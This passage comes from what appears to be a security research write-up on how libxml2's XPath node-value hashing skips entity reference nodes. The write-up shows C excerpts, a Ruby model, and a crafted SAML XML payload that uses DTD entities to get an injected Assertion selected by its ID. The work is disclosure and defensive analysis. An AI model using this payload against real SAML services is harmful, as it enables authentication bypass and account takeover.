if (len == 1) {

return(ret + (string[0] << 8));

}

if (string[1] == 0) {

len = 1;

ret = string[0];

} else {

return(string[0] + (string[1] << 8));

}

}

/*

* Skip to next node

*/

if ((tmp->children != NULL) &&

(tmp->type != XML_DTD_NODE) &&

(tmp->type != XML_ENTITY_REF_NODE) &&

(tmp->children->type != XML_ENTITY_DECL)) {

tmp = tmp->children;

continue;

}

if (tmp == node)

break;

if (tmp->next != NULL) {

tmp = tmp->next;

continue;

}

do {

tmp = tmp->parent;

if (tmp == NULL)

break;

if (tmp == node) {

tmp = NULL;

break;

}

if (tmp->next != NULL) {

tmp = tmp->next;

break;

}

} while (tmp != NULL);

}

return(ret);

}

The hashing function skips entity reference nodes (XML_ENTITY_REF_NODE) and returns 0, so the comparison fails even though the content matches. (This does not happen when XML_PARSE_NOENT is used, because the entities are substituted during parsing and no references remain.)



ID property of the root element
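The effect of the hash pre-filter can be reproduced with a small Ruby model. This is a simplified port for illustration only: `TextNode`, `EntityRef`, `string_hash`, and `attribute_hash` are hypothetical names, and an attribute value is modelled as a flat list of child nodes rather than a real libxml2 tree.

```ruby
# Simplified model of an attribute's children: literal text or an
# unexpanded entity reference.
TextNode  = Struct.new(:content)
EntityRef = Struct.new(:name)

# Counterpart of hashing the query string: its first two bytes.
def string_hash(str)
  bytes = str.bytes
  return 0 if bytes.empty?
  bytes[0] + ((bytes[1] || 0) << 8)
end

# Counterpart of xmlXPathNodeValHash for an attribute: walk the children,
# ignore entity references, and hash the first two text bytes found.
def attribute_hash(children)
  pending = nil # first byte seen when a text node holds a single character
  children.each do |child|
    next unless child.is_a?(TextNode) && !child.content.empty?
    bytes = child.content.bytes
    return pending + (bytes[0] << 8) if pending
    return bytes[0] + (bytes[1] << 8) if bytes.size > 1
    pending = bytes[0]
  end
  pending || 0
end

root_id     = [EntityRef.new('idViaEntity')]                          # ID="&idViaEntity;"
injected_id = [EntityRef.new('BypassIDUniqness'), TextNode.new('_129')] # ID="&BypassIDUniqness;_129"

puts string_hash('_129')         # 12639
puts attribute_hash(root_id)     # 0
puts attribute_hash(injected_id) # 12639
```

In this model the root's ID never passes the pre-filter for `_129`, while the entity-prefixed ID does. A hash match alone is not enough for the XPath comparison to succeed, though: the full string comparison still has to agree afterwards.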

Moving on to why it selects the second Assertion even though its ID is prefixed with an A. Running the C code with the XML document below will actually not find the Assertion, because the C code, unlike its Ruby counterpart, does not duplicate the document before running XPath on it (see #referenced_node). It took me some time to figure this out, since I assumed the #dup call was innocent and would not affect the result.

<?xml version="1.0"?>

<!DOCTYPE note [ <!ENTITY idViaEntity "_129"> <!ENTITY BypassIDUniqness "A"> ]>

<samlp:Response ID="&idViaEntity;">

<saml:Assertion ID="&BypassIDUniqness;_129">http://idp.example.com/metadata.php</saml:Assertion>

</samlp:Response>


Replacing xmlXPathNewContext(doc) with xmlXPathNewContext(xmlCopyDoc(doc, 1)) to match the Nokogiri #dup call makes the Assertion show up in the result again.

The ID attribute of the injected element has two child nodes: the entity reference and, as its next sibling, the text that follows it (_129). The hash function skips the entity reference and hashes the text (_129), so the hashes are equal.

[Figures: duplicated document; original document]

Conclusion

While I am a big fan of auditing through source code review, this finding is a reminder that dynamic testing and fuzzing are essential to uncover edge cases where the code's assumptions do not hold.